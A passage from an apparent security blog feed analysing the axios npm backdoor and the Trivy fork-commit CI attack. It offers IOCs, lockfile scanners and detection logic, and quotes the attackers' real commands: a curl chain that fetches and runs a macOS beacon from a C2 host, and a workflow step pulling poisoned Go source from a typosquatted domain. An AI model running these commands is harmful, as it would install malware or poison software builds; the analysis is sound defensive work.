hours later it was pulled. 
In between, every <code class="language-plaintext highlighter-rouge">npm install</code> and <code class="language-plaintext highlighter-rouge">npx</code> invocation that resolved <code class="language-plaintext highlighter-rouge">axios@latest</code> executed a backdoor on the installing machine. Axios has roughly 80 million weekly downloads. Here’s what that three-hour window looked like from one developer’s MacBook.</p>

<h2 id="monday-night">Monday Night</h2>

<p>A developer sits down, opens a terminal, and runs a command they’ve run dozens of times before:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>npx --yes @datadog/datadog-ci --help
</code></pre></div></div>

<p>A legitimate tool from a legitimate vendor. The <code class="language-plaintext highlighter-rouge">--yes</code> flag skips npm’s confirmation prompt. The developer (or Claude) isn’t even using the tool yet, just checking its options.</p>

<p>npm resolves the dependency tree and starts writing packages to disk: <code class="language-plaintext highlighter-rouge">dogapi</code>, <code class="language-plaintext highlighter-rouge">escodegen</code>, <code class="language-plaintext highlighter-rouge">esprima</code>, <code class="language-plaintext highlighter-rouge">js-yaml</code>, <code class="language-plaintext highlighter-rouge">fast-xml-parser</code>, <code class="language-plaintext highlighter-rouge">rc</code>, <code class="language-plaintext highlighter-rouge">is-docker</code>, <code class="language-plaintext highlighter-rouge">semver</code>, <code class="language-plaintext highlighter-rouge">uuid</code>, and <code class="language-plaintext highlighter-rouge">axios</code>. All names you’d recognize, and all packages that individually look fine. But <code class="language-plaintext highlighter-rouge">axios</code> just resolved to <code class="language-plaintext highlighter-rouge">1.14.1</code>, which is not the version that Axios’s maintainers published four days earlier. It’s the version an attacker published twenty minutes ago.</p>

<h2 id="the-hijack">The Hijack</h2>

<p><code class="language-plaintext highlighter-rouge">axios@1.14.0</code> was the last legitimate release, published on March 27 through GitHub Actions OIDC provenance. The attacker compromised the npm account of <code class="language-plaintext highlighter-rouge">jasonsaayman</code>, an existing Axios maintainer, and changed the account email from <code class="language-plaintext highlighter-rouge">jasonsaayman@gmail.com</code> to <code class="language-plaintext highlighter-rouge">ifstap@proton.me</code>. With publish access, they pushed two malicious versions in quick succession:</p>

<ul>
  <li><strong>00:21:58 UTC</strong>: <code class="language-plaintext highlighter-rouge">axios@1.14.1</code>, tagged <code class="language-plaintext highlighter-rouge">latest</code></li>
  <li><strong>01:00:57 UTC</strong>: <code class="language-plaintext highlighter-rouge">axios@0.30.4</code>, tagged <code class="language-plaintext highlighter-rouge">legacy</code></li>
</ul>

<p>The <code class="language-plaintext highlighter-rouge">latest</code> tag meant every unversioned <code class="language-plaintext highlighter-rouge">axios</code> install worldwide pulled the backdoor. The <code class="language-plaintext highlighter-rouge">legacy</code> tag caught anyone still tracking the 0.x line. Both versions added a single new dependency: <code class="language-plaintext highlighter-rouge">plain-crypto-js</code>.</p>
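
<p>Those three identifiers are enough for a quick lockfile check. A minimal sketch, assuming an npm <code class="language-plaintext highlighter-rouge">package-lock.json</code> whose <code class="language-plaintext highlighter-rouge">resolved</code> fields point at registry tarballs. <code class="language-plaintext highlighter-rouge">scan_lockfile</code> is a hypothetical helper name.</p>

```shell
# Sketch only: scan_lockfile is a hypothetical helper. The package name and versions
# come from the timeline above; the lockfile layout is assumed to be npm's.
# Returns 0 when the lockfile looks clean and 1 when any indicator is present.
scan_lockfile() {
  lockfile="$1"
  found=0

  # The injected dependency should never appear in a clean tree.
  if grep -qF 'plain-crypto-js' "$lockfile"; then
    printf '%s: references plain-crypto-js\n' "$lockfile"
    found=1
  fi

  # Registry tarball URLs embed the exact version that was resolved.
  for version in 1.14.1 0.30.4; do
    if grep -qF "axios/-/axios-$version.tgz" "$lockfile"; then
      printf '%s: resolved axios@%s\n' "$lockfile" "$version"
      found=1
    fi
  done

  [ "$found" -eq 0 ]
}
```

<p>A clean result only covers what the lockfile records. One-off <code class="language-plaintext highlighter-rouge">npx</code> runs don’t touch a project lockfile, so they need to be checked some other way.</p>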

<h2 id="the-postinstall-chain">The Postinstall Chain</h2>

<p><code class="language-plaintext highlighter-rouge">plain-crypto-js</code> declared <code class="language-plaintext highlighter-rouge">postinstall: node setup.js</code> in its <code class="language-plaintext highlighter-rouge">package.json</code>, and npm ran it automatically. The script used two layers of obfuscation (string reversal with base64 decoding, then an XOR cipher keyed with <code class="language-plaintext highlighter-rouge">OrDeR_7077</code>) to hide its real behavior from anyone grepping for suspicious strings. Once decoded, it branched by platform.</p>
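
<p>To see why grepping fails against even the first layer, here is a minimal sketch that undoes one "reverse, then base64" encoding. The sample string is made up, the real script’s exact layering may differ, and the XOR layer is left out. <code class="language-plaintext highlighter-rouge">decode_reversed_base64</code> is a hypothetical helper name.</p>

```shell
# Sketch only: the sample string is made up, and the real script's layering may differ.
# Undoes a single layer: reverse the characters, then base64-decode the result.
decode_reversed_base64() {
  printf '%s\n' "$1" | rev | base64 -d
}

# "=8GbsVGa" is "aGVsbG8=" reversed, and "aGVsbG8=" is the base64 encoding of "hello".
decode_reversed_base64 '=8GbsVGa'
```

<p>The encoded form shares no substring with the plaintext, so a search for strings like <code class="language-plaintext highlighter-rouge">curl</code> or <code class="language-plaintext highlighter-rouge">osascript</code> in the package source comes back empty until the layers are peeled off.</p>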

<p>On the developer’s Mac, CrowdStrike’s process tree captured the full chain. <code class="language-plaintext highlighter-rouge">npx</code> spawned <code class="language-plaintext highlighter-rouge">node setup.js</code>, which shelled out to <code class="language-plaintext highlighter-rouge">/bin/sh</code> to launch <code class="language-plaintext highlighter-rouge">osascript</code> against a script dropped into the per-user temp directory:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nohup osascript /var/folders/gz/s87fs56d0pqbr1s7l1b898h80000gn/T/6202033
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">osascript</code> is Apple’s AppleScript interpreter, a legitimate Apple-signed binary present on every Mac. Running code through it instead of directly lets the attacker hide behind a trusted process name. The <code class="language-plaintext highlighter-rouge">nohup</code> ensures the process survives if the parent terminal closes, and the AppleScript then executed the real payload:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sh <span class="nt">-c</span> <span class="s1">'curl -o /Library/Caches/com.apple.act.mond \
            -d packages.npm.org/product0 \
            -s http://sfrclak.com:8000/6202033 \
       &amp;&amp; chmod 770 /Library/Caches/com.apple.act.mond \
       &amp;&amp; /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &amp;"'</span> <span class="se">\</span>
  &amp;&gt; /dev/null
</code></pre></div></div>

<p>Download, set executable, and launch the beacon, all in a single <code class="language-plaintext highlighter-rouge">sh -c</code> invocation. If any step fails, the chain stops. If it succeeds, the malware is already running before the AppleScript exits.</p>

<p>The output path masquerades as an Apple system daemon using the <code class="language-plaintext highlighter-rouge">com.apple.*</code> reverse-DNS convention. The <code class="language-plaintext highlighter-rouge">-d packages.npm.org/product0</code> is not a real npm URL but a tracking identifier sent as POST data so the C2 knows which package triggered the install. The <code class="language-plaintext highlighter-rouge">-s</code> flag keeps curl silent, and the outer <code class="language-plaintext highlighter-rouge">&amp;&gt; /dev/null</code> swallows any output from the entire chain.</p>

<p>The binary immediately began beaconing to <code class="language-plaintext highlighter-rouge">142.11.206.73:8000</code> (<code class="language-plaintext highlighter-rouge">sfrclak.com</code>) over HTTP. Ten hours later, CrowdStrike’s telemetry shows <code class="language-plaintext highlighter-rouge">com.apple.act.mond</code> still running and reading <code class="language-plaintext highlighter-rouge">/Library/Preferences/com.apple.networkd.plist</code> for network interface configurations, proxy settings, and VPN connection details. The kind of reconnaissance you do when you’re deciding whether a machine is worth keeping access to.</p>

<p>Meanwhile, back in <code class="language-plaintext highlighter-rouge">node_modules</code>, <code class="language-plaintext highlighter-rouge">setup.js</code> was cleaning up after itself. It deleted its own file with <code class="language-plaintext highlighter-rouge">fs.unlink(__filename)</code> and renamed a clean <code class="language-plaintext highlighter-rouge">package.md</code> to <code class="language-plaintext highlighter-rouge">package.json</code>, overwriting the version that declared the postinstall hook. Anyone investigating the installed package later would find no trace of the trigger.</p>

<h2 id="not-just-macs">Not Just Macs</h2>

<p>The same <code class="language-plaintext highlighter-rouge">setup.js</code> had branches for every major platform:</p>

<table>
  <thead>
    <tr>
      <th>Platform</th>
      <th>Payload Path</th>
      <th>Technique</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>macOS</td>
      <td><code class="language-plaintext highlighter-rouge">/Library/Caches/com.apple.act.mond</code></td>
      <td>AppleScript, curl, binary masquerading as Apple daemon</td>
    </tr>
    <tr>
      <td>Windows</td>
      <td><code class="language-plaintext highlighter-rouge">%PROGRAMDATA%\wt.exe</code></td>
      <td>PowerShell copied and renamed to look like Windows Terminal; VBScript loader drops <code class="language-plaintext highlighter-rouge">.ps1</code> payload with <code class="language-plaintext highlighter-rouge">-w hidden -ep bypass</code></td>
    </tr>
    <tr>
      <td>Linux</td>
      <td><code class="language-plaintext highlighter-rouge">/tmp/ld.py</code></td>
      <td>Python script downloaded and backgrounded with <code class="language-plaintext highlighter-rouge">nohup python3</code></td>
    </tr>
  </tbody>
</table>

<p>All three phoned home to the same C2: <code class="language-plaintext highlighter-rouge">sfrclak.com:8000/6202033</code>.</p>

<h2 id="what-crowdstrike-caught-and-didnt">What CrowdStrike Caught (and Didn’t)</h2>

<p>Falcon flagged the macOS beacon as <code class="language-plaintext highlighter-rouge">MacOSApplicationLayerProtocol</code>, mapping to <a href="https://attack.mitre.org/techniques/T1071/">T1071</a> (Application Layer Protocol) under <a href="https://attack.mitre.org/tactics/TA0011/">TA0011</a> (Command and Control). The detection triggered on the last step in the chain: a binary at a suspicious path making outbound HTTP requests on a non-standard port.</p>

<p>Everything before that ran unimpeded. The <code class="language-plaintext highlighter-rouge">node setup.js</code> postinstall hook, the <code class="language-plaintext highlighter-rouge">osascript</code> execution from a temp directory, the <code class="language-plaintext highlighter-rouge">curl</code> download and <code class="language-plaintext highlighter-rouge">chmod</code> all completed before any security tooling intervened. If the attacker had used HTTPS on port 443 to a less suspicious-looking domain, the beacon might have gone undetected too.</p>

<h2 id="iocs">IOCs</h2>

<table>
  <thead>
    <tr>
      <th>Indicator</th>
      <th>Type</th>
      <th>Value</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>C2 Domain</td>
      <td>Domain</td>
      <td><code class="language-plaintext highlighter-rouge">sfrclak.com</code></td>
    </tr>
    <tr>
      <td>C2 IP</td>
      <td>IPv4</td>
      <td><code class="language-plaintext highlighter-rouge">142.11.206.73</code></td>
    </tr>
    <tr>
      <td>C2 Port</td>
      <td>Port</td>
      <td><code class="language-plaintext highlighter-rouge">8000</code></td>
    </tr>
    <tr>
      <td>Campaign ID</td>
      <td>String</td>
      <td><code class="language-plaintext highlighter-rouge">6202033</code></td>
    </tr>
    <tr>
      <td>macOS Payload</td>
      <td>File</td>
      <td><code class="language-plaintext highlighter-rouge">/Library/Caches/com.apple.act.mond</code></td>
    </tr>
    <tr>
      <td>macOS Hash</td>
      <td>SHA256</td>
      <td><code class="language-plaintext highlighter-rouge">92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a</code></td>
    </tr>
    <tr>
      <td>Windows Payload</td>
      <td>File</td>
      <td><code class="language-plaintext highlighter-rouge">%PROGRAMDATA%\wt.exe</code></td>
    </tr>
    <tr>
      <td>Linux Payload</td>
      <td>File</td>
      <td><code class="language-plaintext highlighter-rouge">/tmp/ld.py</code></td>
    </tr>
    <tr>
      <td>Tracking ID</td>
      <td>String</td>
      <td><code class="language-plaintext highlighter-rouge">packages.npm.org/product0</code></td>
    </tr>
    <tr>
      <td>Compromised Packages</td>
      <td>npm</td>
      <td><code class="language-plaintext highlighter-rouge">axios@1.14.1</code>, <code class="language-plaintext highlighter-rouge">axios@0.30.4</code>, <code class="language-plaintext highlighter-rouge">plain-crypto-js@4.2.0</code> through <code class="language-plaintext highlighter-rouge">plain-crypto-js@4.2.1</code></td>
    </tr>
    <tr>
      <td>Hijacked Account</td>
      <td>npm</td>
      <td><code class="language-plaintext highlighter-rouge">jasonsaayman</code> (email changed to <code class="language-plaintext highlighter-rouge">ifstap@proton.me</code>)</td>
    </tr>
    <tr>
      <td>XOR Key</td>
      <td>String</td>
      <td><code class="language-plaintext highlighter-rouge">OrDeR_7077</code></td>
    </tr>
  </tbody>
</table>
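<p>If you want to sweep a host for the file indicators, a minimal sketch might look like the following. The function names are mine, the Windows path is left out for brevity, and only the macOS hash is known, so a hit on any other path still needs manual triage.</p>

```python
import hashlib
from pathlib import Path

# Values copied from the IOC table; the helper names below are hypothetical.
MACOS_PAYLOAD_SHA256 = "92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a"
PAYLOAD_PATHS = [
    "/Library/Caches/com.apple.act.mond",  # macOS
    "/tmp/ld.py",                          # Linux
]


def sha256_of(path):
    """Hash a file in chunks so large binaries are not loaded into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_payloads(paths=PAYLOAD_PATHS):
    """Return (path, sha256, matches_known_hash) for every IOC path that exists."""
    hits = []
    for raw in paths:
        path = Path(raw)
        if path.is_file():
            file_hash = sha256_of(path)
            hits.append((str(path), file_hash, file_hash == MACOS_PAYLOAD_SHA256))
    return hits
```

<p>An empty result from <code class="language-plaintext highlighter-rouge">find_payloads()</code> only means these specific paths are absent. It says nothing about a payload that was renamed or already removed.</p>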

<h2 id="takeaways">Takeaways</h2>

<p><strong>Check your lockfiles now.</strong> Search <code class="language-plaintext highlighter-rouge">package-lock.json</code>, <code class="language-plaintext highlighter-rouge">yarn.lock</code>, and <code class="language-plaintext highlighter-rouge">pnpm-lock.yaml</code> for <code class="language-plaintext highlighter-rouge">axios@1.14.1</code>, <code class="language-plaintext highlighter-rouge">axios@0.30.4</code>, or any reference to <code class="language-plaintext highlighter-rouge">plain-crypto-js</code>. If you find them, assume the installing machine is compromised.</p>
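<p>A plain text search works, but <code class="language-plaintext highlighter-rouge">package-lock.json</code> stores the name and version in separate fields, so a small parser is more reliable there. This is a rough sketch that assumes lockfile version 2 or 3 (the top-level <code class="language-plaintext highlighter-rouge">packages</code> map); the function names are hypothetical, and <code class="language-plaintext highlighter-rouge">yarn.lock</code> and <code class="language-plaintext highlighter-rouge">pnpm-lock.yaml</code> would need their own handling.</p>

```python
import json

BAD_AXIOS_VERSIONS = {"1.14.1", "0.30.4"}
BAD_PACKAGE = "plain-crypto-js"


def scan_package_lock(lock):
    """Return findings from a parsed package-lock.json (lockfileVersion 2 or 3)."""
    findings = []
    for location, meta in lock.get("packages", {}).items():
        # Keys look like "node_modules/axios" or "node_modules/a/node_modules/axios".
        name = location.rpartition("node_modules/")[2]
        version = meta.get("version", "")
        if name == BAD_PACKAGE:
            findings.append(f"{location}: {BAD_PACKAGE}@{version}")
        elif name == "axios" and version in BAD_AXIOS_VERSIONS:
            findings.append(f"{location}: axios@{version}")
    return findings


def scan_file(path):
    """Load a lockfile from disk and scan it."""
    with open(path, encoding="utf-8") as handle:
        return scan_package_lock(json.load(handle))
```

<p>Running <code class="language-plaintext highlighter-rouge">scan_file("package-lock.json")</code> in each project root returns an empty list when nothing matches. Any entry in the list means the machine that ran the install should be treated as compromised.</p>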

<p><strong>Disable postinstall scripts.</strong> Add <code class="language-plaintext highlighter-rouge">ignore-scripts=true</code> to <code class="language-plaintext highlighter-rouge">~/.npmrc</code>. When a package legitimately needs a postinstall hook for native compilation, review the script first, then run <code class="language-plaintext highlighter-rouge">npm rebuild &lt;package&gt; --ignore-scripts=false</code> explicitly; the flag overrides the <code class="language-plaintext highlighter-rouge">.npmrc</code> setting for that one command. Setting <code class="language-plaintext highlighter-rouge">ignore-scripts=true</code> alone would have stopped the entire attack chain.</p>

<p><strong>Monitor for <code class="language-plaintext highlighter-rouge">osascript</code> spawned by <code class="language-plaintext highlighter-rouge">node</code>.</strong> There is no legitimate reason for a Node.js process to execute AppleScript from a temp directory. If your endpoint detection sees that process ancestry, kill it.</p>
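<p>As a rough illustration of that rule, here is the matching logic written against a made-up event shape. <code class="language-plaintext highlighter-rouge">ProcessEvent</code> and its fields are hypothetical; a real EDR exposes its own schema and query language, so treat this as a description of the condition rather than something to deploy.</p>

```python
from dataclasses import dataclass

# Directories where a dropped script is likely to live (macOS temp locations).
TEMP_PREFIXES = ("/var/folders/", "/private/var/folders/", "/tmp/", "/private/tmp/")
NODE_TOOLING = {"node", "npm", "npx"}


@dataclass
class ProcessEvent:
    """Hypothetical process-start record; real EDR telemetry schemas will differ."""
    name: str            # executable name, e.g. "osascript"
    command_line: str    # full command line as a single string
    ancestors: tuple     # process names from the parent up to the root


def is_suspicious(event):
    """Flag osascript running a temp-directory script with Node.js in its ancestry."""
    if event.name != "osascript":
        return False
    if NODE_TOOLING.isdisjoint(event.ancestors):
        return False
    return any(arg.startswith(TEMP_PREFIXES) for arg in event.command_line.split())
```

<p>The check walks the whole ancestry rather than just the direct parent because, in this incident, <code class="language-plaintext highlighter-rouge">/bin/sh</code> sat between <code class="language-plaintext highlighter-rouge">node</code> and <code class="language-plaintext highlighter-rouge">osascript</code>.</p>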

<p>The developer did nothing wrong. They ran a standard tool from a major vendor and trusted npm to deliver safe code. The problem is that npm’s default behavior (resolve the full tree, install everything, run every postinstall script, no questions asked) turns every <code class="language-plaintext highlighter-rouge">npm install</code> into an implicit trust decision across hundreds of packages maintained by people you’ve never met. The Axios maintainer account was compromised for three hours. That was enough.</p>

<hr />

<p><em>This is the third post in a series on software supply chain attacks. The previous posts covered the <a href="/2026/03/20/typosquatting-trivy">Trivy ecosystem compromise</a> and <a href="/2026/03/24/sha-pinning-is-not-enough">the limits of SHA pinning</a>. Joe Desimone’s <a href="https://gist.github.com/joe-desimone/36061dabd2bc2513705e0d083a9673e7">technical analysis</a> of the axios compromise is worth reading in full.</em></p>

<p>If you liked (or hated) this blog, feel free to check out my <a href="https://github.com/R0seSecurity">GitHub</a>!</p>]]></content><author><name></name></author><category term="security" /><category term="supply-chain" /><category term="npm" /><summary type="html"><![CDATA[At 00:21 UTC on March 31, someone published axios@1.14.1 to npm. Three hours later it was pulled. In between, every npm install and npx invocation that resolved axios@latest executed a backdoor on the installing machine. Axios has roughly 80 million weekly downloads, and here’s what that three-hour window looked like from one developer’s MacBook.]]></summary></entry><entry><title type="html">SHA Pinning Is Not Enough</title><link href="https://rosesecurity.cloud/2026/03/24/sha-pinning-is-not-enough.html" rel="alternate" type="text/html" title="SHA Pinning Is Not Enough" /><published>2026-03-24T00:00:00+00:00</published><updated>2026-03-24T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2026/03/24/sha-pinning-is-not-enough</id><content type="html" xml:base="https://rosesecurity.cloud/2026/03/24/sha-pinning-is-not-enough.html"><![CDATA[<p>A few days ago I wrote about <a href="/2026/03/20/typosquatting-trivy">how the Trivy ecosystem got turned into a credential stealer</a>. One of my takeaways was “pin by SHA.” Every supply chain security guide says it, I’ve said it, every subreddit says it, and the GitHub Actions hardening docs say it.</p>

<p>The Trivy attack proved that advice incomplete, and I think we need to talk about why.</p>

<h2 id="quick-refresher">Quick Refresher</h2>

<p>For anyone not familiar, SHA pinning looks like this:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Tag reference (mutable, dangerous)</span>
<span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/checkout@v6.0.2</span>

<span class="c1"># SHA-pinned (immutable, safe... right?)</span>
<span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd</span> <span class="c1"># v6.0.2</span>
</code></pre></div></div>

<p>Git tags are just pointers, so anyone with write access can move a tag to a different commit. SHAs are cryptographic hashes of the commit content. You can’t forge one and you can’t move one. Pin to a SHA and you get exactly the code you reviewed, forever.</p>

<p>That logic is correct, but it’s not the whole picture.</p>

<h2 id="what-actually-happened">What Actually Happened</h2>

<p>On March 4, <a href="https://github.com/aquasecurity/trivy/commit/1885610c6a34811c8296416ae69f568002ef11ec">commit <code class="language-plaintext highlighter-rouge">1885610c</code></a> landed in <code class="language-plaintext highlighter-rouge">aquasecurity/trivy</code>. The message said <code class="language-plaintext highlighter-rouge">fix(ci): Use correct checkout pinning</code>, attributed to <code class="language-plaintext highlighter-rouge">DmitriyLewen</code> (a legitimate maintainer). The diff touched two workflow files across 14 lines. Most of it was noise: single quotes swapped for double quotes, a trailing space removed from a <code class="language-plaintext highlighter-rouge">mkdir</code> line. The kind of commit that gets waved through review because there’s nothing to review.</p>

<p>Two lines mattered. The first swapped the <code class="language-plaintext highlighter-rouge">actions/checkout</code> SHA in the release workflow:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gd">-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
</span><span class="gi">+        uses: actions/checkout@70379aad1a8b40919ce8b382d3cd7d0315cde1d0 # v6.0.2
</span></code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge"># v6.0.2</code> comment stayed. The SHA changed. The second change added <code class="language-plaintext highlighter-rouge">--skip=validate</code> to the GoReleaser invocation, disabling integrity checks on the build artifacts.</p>

<p>The payload lived at the other end of that SHA. <a href="https://github.com/actions/checkout/commit/70379aad1a8b40919ce8b382d3cd7d0315cde1d0">Commit <code class="language-plaintext highlighter-rouge">70379aad</code></a> sits in the <code class="language-plaintext highlighter-rouge">actions/checkout</code> repository as an orphaned commit. Someone had forked <code class="language-plaintext highlighter-rouge">actions/checkout</code>, created a commit with malicious code, and walked away. GitHub’s UI actually flags it with a yellow banner: <em>“This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.”</em> The author is listed as <code class="language-plaintext highlighter-rouge">Guillermo Rauch &lt;rauchg@gmail.com&gt;</code> (spoofed), the commit message references <a href="https://github.com/actions/checkout/pull/2356">PR #2356</a> (a real, closed PR by a GitHub employee), and the commit is unsigned. Every bit of metadata is designed to look routine at a glance.</p>

<p>Here’s the part that should bother you: GitHub’s architecture makes fork commits reachable by SHA from the parent repo. When GitHub Actions resolved <code class="language-plaintext highlighter-rouge">actions/checkout@70379aad...</code>, it fetched the commit, found valid code, and ran it. No warning in the run log. No signal that this commit came from outside the repository’s branch history. As far as the runtime was concerned, it was a totally normal commit in <code class="language-plaintext highlighter-rouge">actions/checkout</code>.</p>

<p>Anyone can do this right now. Fork a popular action, create a commit with whatever code you want, and produce a SHA that GitHub will resolve as if it belongs to the original repository. SHA pinning guarantees you get the same commit every time. It does <em>not</em> guarantee that commit was ever part of the upstream project.</p>

<h2 id="nobody-reads-hex-strings">Nobody Reads Hex Strings</h2>

<p>The malicious checkout replaced <code class="language-plaintext highlighter-rouge">action.yml</code>’s Node.js entrypoint with a composite action that did a legitimate checkout first, then silently pulled down replacements for the Trivy source:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Setup</span><span class="nv"> </span><span class="s">Checkout"</span>
  <span class="na">shell</span><span class="pi">:</span> <span class="s">bash</span>
  <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span>
    <span class="s">BASE="https://scan.aquasecurtiy.org/static"</span>
    <span class="s">curl -sf "$BASE/main.go" -o cmd/trivy/main.go &amp;&gt; /dev/null</span>
    <span class="s">curl -sf "$BASE/scand.go" -o cmd/trivy/scand.go &amp;&gt; /dev/null</span>
    <span class="s">curl -sf "$BASE/fork_unix.go" -o cmd/trivy/fork_unix.go &amp;&gt; /dev/null</span>
    <span class="s">curl -sf "$BASE/fork_windows.go" -o cmd/trivy/fork_windows.go &amp;&gt; /dev/null</span>
    <span class="s">curl -sf "$BASE/.golangci.yaml" -o .golangci.yaml &amp;&gt; /dev/null</span>
</code></pre></div></div>

<p>Four Go files from a typosquatted C2, dropped into <code class="language-plaintext highlighter-rouge">cmd/trivy/</code>, replacing the real source. A fifth download replaced <code class="language-plaintext highlighter-rouge">.golangci.yaml</code> to disable linter rules that would have flagged the injected code. GoReleaser ran with validation skipped, built binaries from the poisoned source, and published them as <code class="language-plaintext highlighter-rouge">v0.69.4</code> through Trivy’s own release infrastructure. The malware was compiled in. No runtime download, no shell script, no base64.</p>

<p>But none of that is visible from the Trivy repository side. What a reviewer actually sees is this:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gd">-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
</span><span class="gi">+        uses: actions/checkout@70379aad1a8b40919ce8b382d3cd7d0315cde1d0 # v6.0.2
</span></code></pre></div></div>

<p>Two 40-character hex strings, both ending with <code class="language-plaintext highlighter-rouge"># v6.0.2</code>. Be honest: you didn’t compare them character by character just now. Neither did anyone reviewing that commit. The version comment is the thing people actually read, and the version comment is just a freeform string that anybody can type.</p>
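<p>One way to take that comparison away from human eyes is to flag it mechanically. The sketch below scans a unified diff for actions whose pinned SHA changed while the version comment stayed the same. The function name and regex are mine, and it assumes each action appears at most once per side of the diff.</p>

```python
import re

# Matches removed/added "uses: owner/repo@<40-hex sha> # label" lines in a unified diff.
USES_RE = re.compile(r"^([-+])\s*(?:-\s*)?uses:\s*([\w./-]+)@([0-9a-f]{40})\s*(?:#\s*(\S+))?")


def silent_sha_swaps(diff_text):
    """Find actions whose pinned SHA changed while the version comment did not."""
    removed, added = {}, {}
    for line in diff_text.splitlines():
        match = USES_RE.match(line)
        if match:
            sign, action, sha, label = match.groups()
            (removed if sign == "-" else added)[action] = (sha, label)
    swaps = []
    for action, (old_sha, old_label) in removed.items():
        new_sha, new_label = added.get(action, (old_sha, old_label))
        if new_sha != old_sha and new_label == old_label:
            swaps.append((action, old_sha, new_sha, old_label))
    return swaps
```

<p>A legitimate version bump changes both the SHA and the comment, so it passes through untouched. A SHA that moves underneath an unchanged <code class="language-plaintext highlighter-rouge"># v6.0.2</code> is exactly the pattern worth blocking in CI.</p>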

<p>SHA pinning optimizes for machine verification but falls apart at the moment a human has to review a change. The attacker knew this, which is why the rest of the 14-line diff was cosmetic noise. Hide the important thing behind boring things, and the reviewer’s attention goes to the boring things.</p>

<h2 id="the-comment-that-lied">The Comment That Lied</h2>

<p>There’s a convention that’s emerged with SHA pinning where you put the version tag in a comment next to the SHA so humans can tell what version they’re using:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd</span> <span class="c1"># v6.0.2</span>
</code></pre></div></div>

<p>That comment is free text. Nothing validates it. No tool in the GitHub Actions pipeline checks that the SHA actually corresponds to <code class="language-plaintext highlighter-rouge">v6.0.2</code>. Dependabot and Renovate verify tag-to-SHA mappings when <em>they</em> make updates, but they can’t protect against someone hand-editing a SHA and typing whatever they want in the comment. In this case, the commit came from a maintainer account (or at least one with write access), so it sailed right past branch protection.</p>
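<p>Closing that gap yourself is not much code. Here is a minimal sketch that reads the pins out of a workflow file and asks the GitHub REST API what each commented tag resolves to. The function names are hypothetical, the request is unauthenticated (so rate limits apply), and it only proves the comment matches the tag as it stands today, not that the tag itself is honest.</p>

```python
import json
import re
import urllib.request

# Captures owner/repo, the 40-hex SHA, and the version label from the trailing comment.
PIN_RE = re.compile(r"uses:\s*([\w.-]+/[\w.-]+)[\w./-]*@([0-9a-f]{40})\s*#\s*(\S+)")


def resolve_tag(repo, tag):
    """Ask the GitHub REST API which commit a tag currently resolves to."""
    url = f"https://api.github.com/repos/{repo}/commits/{tag}"
    request = urllib.request.Request(url, headers={"Accept": "application/vnd.github+json"})
    with urllib.request.urlopen(request, timeout=10) as response:
        return json.load(response)["sha"]


def lying_comments(workflow_text, resolver=resolve_tag):
    """Return pins whose SHA is not the commit their version comment names."""
    mismatches = []
    for repo, sha, label in PIN_RE.findall(workflow_text):
        actual = resolver(repo, label)
        if actual != sha:
            mismatches.append((repo, label, sha, actual))
    return mismatches
```

<p>The <code class="language-plaintext highlighter-rouge">resolver</code> parameter exists so the lookup can be swapped for a cached or authenticated one, or for a stub in tests.</p>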

<p>The comment <code class="language-plaintext highlighter-rouge"># v6.0.2</code> was the entire social engineering payload on the Trivy repository side. Not a phishing email, not a fake login page. Eight characters in a YAML comment that made a reviewer’s brain skip right past the hex string next to it.</p>

<h2 id="what-actually-helps">What Actually Helps</h2>

<p>SHA pinning is still better than tag references. It knocks out one class of attack (tag mutation) entirely. But treating it as “good enough” is where things fall apart.</p>

<p>The fork commit problem is the most immediate thing you can act on. Before you accept a SHA change in a PR, click through to the commit in the target repository. For <code class="language-plaintext highlighter-rouge">actions/checkout@70379aad...</code>, that would have shown GitHub’s yellow “does not belong to any branch” banner. That’s a hard no. Any SHA pin for a GitHub Action should point to a commit that lives on a release branch or tag in the official repo, not an orphaned commit from some fork. You can automate part of this check with the GitHub API: <code class="language-plaintext highlighter-rouge">repos/{owner}/{repo}/commits/{sha}/branches-where-head</code> returns an empty list for orphaned commits. It also returns an empty list for any commit that is not currently the tip of a branch, so treat an empty result as a prompt to check whether the SHA matches a release tag or sits in a branch’s history, not as proof of tampering.</p>
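<p>Here is a rough sketch of that automation. Alongside <code class="language-plaintext highlighter-rouge">branches-where-head</code> it uses the compare endpoint to ask whether the commit is an ancestor of a branch. That second check is my addition, and the default branch name, the function names, and the lack of error handling (a missing commit will raise an HTTP error) are all assumptions to adjust.</p>

```python
import json
import urllib.request

API = "https://api.github.com"


def get_json(path):
    """Fetch one GitHub REST API path (unauthenticated, so rate limits apply)."""
    request = urllib.request.Request(API + path, headers={"Accept": "application/vnd.github+json"})
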